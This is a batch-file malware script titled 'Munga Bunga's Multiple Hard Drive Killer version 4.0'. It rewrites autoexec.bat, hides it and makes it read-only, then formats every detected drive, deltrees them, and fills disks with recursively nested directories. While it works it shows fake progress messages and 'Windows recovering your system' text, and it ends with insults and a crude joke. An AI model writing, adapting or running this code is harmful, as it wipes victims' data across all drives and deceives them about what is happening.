@echo off
rem This program is dedecated to a very special person that does not want to be named.
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo call format c: /q /u /autoSample >nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about how it
rem works, it's d*amn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc >>drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
if %drive.==. set drive=c
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat
echo cd >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0. >>c:autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:autoexec.bat
echo echo 2. Love is important, if you have it, truly, don't let go of it like I did! >>c:autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is dead. >>c:autoexec.bat
echo echo 4. Don't support the following: War, Racism, Drugs and the Liberal Party.>>c:autoexec.bat
echo echo. >>c:autoexec.bat
echo echo Regards, >>c:autoexec.bat
echo echo. >>c:autoexec.bat
echo echo Munga Bunga >>c:autoexec.bat
call attrib +r +h c:autoexec.bat
if exist c:temp.bat attrib -r -h c:temp.bat >nul
echo @echo off >c:temp.bat
echo %%1: >>c:temp.bat
echo cd >>c:temp.bat
echo :startmd >>c:temp.bat
echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a >>c:temp.bat
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:temp.bat
echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto startmd >>c:temp.bat
call attrib +r +h c:temp.bat >nul
echo Initializing Variables . . .
rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga >nul
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a: /S >nul
call attrib +r +h c:temp.bat >nul
call attrib +r +h c:autoexec.bat >nul
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
for %%a in (%drive%) call deltree /y %%a:*. >nul
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga >nul
echo Thank you for using a Munga Bunga product.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo Here is a joke for you . . .
echo Q). What's the worst thing about being an egg?
echo A). You only get laid once.
echo HAHAHAHA, get it? Don't you just love that one?
echo Regards,
echo Munga Bunga
rem Hard Drive Killer Pro Version 4.0, enjoy!!!!
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